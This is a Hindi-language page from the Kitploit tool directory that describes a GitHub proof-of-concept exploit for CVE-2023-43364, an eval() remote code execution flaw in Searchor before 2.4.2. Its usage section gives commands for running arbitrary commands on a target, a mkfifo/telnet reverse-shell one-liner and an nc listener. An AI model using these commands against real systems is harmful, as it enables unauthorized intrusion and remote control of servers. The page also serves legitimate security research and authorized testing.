Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

Searchor (< 2.4.2) में असुरक्षित `eval()` उपयोग के माध्यम से POC exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

CVE-2023-43364 – Searchor RCE एक्सप्लॉइट (PoC)

Searchor (< 2.4.2) में असुरक्षित eval() उपयोग के माध्यम से रिमोट कोड निष्पादन (RCE)

परिचय

यह प्रोजेक्ट CVE-2023-43364 के शोषण को प्रदर्शित करता है, जो Python पैकेज Searchor (< 2.4.2) को प्रभावित करने वाली एक रिमोट कोड निष्पादन (RCE) भेद्यता है।

यह समस्या उपयोगकर्ता-नियंत्रित इनपुट पर eval() के असुरक्षित उपयोग के कारण होती है, जो हमलावरों को मनमाना Python कोड इंजेक्ट और निष्पादित करने की अनुमति देती है।

यह भेद्यता असुरक्षित eval() उपयोग को हटाकर ठीक की गई थी, जैसा कि आधिकारिक पैच में दिखाया गया है:

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

अतिरिक्त तकनीकी विवरण और परामर्श:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

यह प्रूफ ऑफ कॉन्सेप्ट कई निष्पादन विधियाँ प्रदान करता है, जिनमें कमांड निष्पादन, परीक्षण सत्यापन और रिवर्स शेल शामिल हैं।

उपयोग

RCE परीक्षण

कोड निष्पादन सत्यापित करने के लिए एक सरल कमांड (id) चलाएँ:

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

कस्टम कमांड निष्पादित करें

लक्ष्य सर्वर पर कोई भी कमांड चलाएँ:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

उदाहरण:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

रिवर्स शेल

अपनी मशीन पर एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ अस्वीकरण

यह प्रोजेक्ट निम्नलिखित उद्देश्यों के लिए है:

  • शैक्षिक उद्देश्यों
  • सुरक्षा अनुसंधान
  • केवल अधिकृत पेनेट्रेशन परीक्षण

लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

इस एक्सप्लॉइट का उपयोग केवल नियंत्रित वातावरण में या उन सिस्टमों पर करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति है

टूल डाउनलोड करें